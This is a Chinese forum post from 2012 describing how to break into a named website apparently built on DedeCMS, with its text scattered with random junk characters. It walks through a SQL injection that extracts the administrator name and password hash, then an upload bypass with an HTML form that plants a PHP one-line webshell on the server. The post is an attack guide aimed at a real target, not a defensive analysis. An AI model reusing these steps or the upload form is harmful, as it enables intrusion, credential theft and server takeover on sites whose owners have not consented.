①注入漏洞。6 M; @* g, V& X/ v- ]' i+ [9 p3 p
这站 http://www.political-security.com/ h1 n- b: h8 k) {0 L5 A
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
7 W3 A% l, [4 ]( Xwww.political-security.com/data/mysql_error_trace.inc 爆后台
+ i8 y" F. F$ O# o6 o: g/ @' J然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
( C, b) {$ J4 w$ o0 o然后写上语句
' J/ W9 ?8 A# V3 J3 {: h0 U9 w查看管理员帐号8 Z" E+ `4 }' D' h2 B( L- @$ Y
http://www.political-security.co ... &membergroup=@`
\. a* N1 w# b2 |9 |8 f8 a& o B% ^ b$ Q
admin * [) G. L( Y# B0 G+ {' q
0 A4 }0 U) {3 I- x: w
查看管理员密码$ ~3 ~" Q0 n; O2 k; T& v- c
http://www.political-security.co ... &membergroup=@`3 { w- M* k0 ]: v. a$ @+ `
# ^1 C. Y' n3 k* P& _) N: u+ l
8d29b1ef9f8c5a5af4297 a- h* `% m5 x6 G% B( [
) b( C' A: n4 Y- J查看管理员密码
6 Q/ }- H5 @9 r/ x. {% k0 ~
7 a5 \8 D; z7 I# \得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5/ |+ Z7 R, u7 L( _9 M" D( U" ?
* Y: M2 K# u' q; {2 P+ l/ D
8d2
G i4 r; c& m) {9 u$ c" F$ I9b1ef9f8c5a5af42
% t3 A, H" t+ A( T* `, t* P9" V/ }+ i/ D5 @' ]0 t
& `% U9 p# i. O# s' J) I+ Rcmd5没解出来 只好测试第二个方法, B! c2 e. J U; z- |1 M
/ l6 r; \* d2 I n5 N: N
$ u* n! a- E8 s% h; D( _6 a8 U/ v②上传漏洞:4 r2 k2 \& \6 d' p+ i
' n* x4 ^* @; a" a5 |" Y( z' P只要登陆会员中心,然后访问页面链接
6 T: k2 k! `! K“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
4 j, s. a2 \$ O8 H4 w- U" i* z9 w) N# D
@, ]0 x1 H& x. H" X) z+ S2 R如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”. M+ V O/ n. w4 m
9 ?. B. _& q$ E: k: H; c) N于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
& ^4 C9 Z1 s/ ~. r5 ]7 @) x. k* o1 k5 i4 R, }
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; J. N/ Z% p$ L8 C或者
6 R* M1 n3 _3 C" W) F; {即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对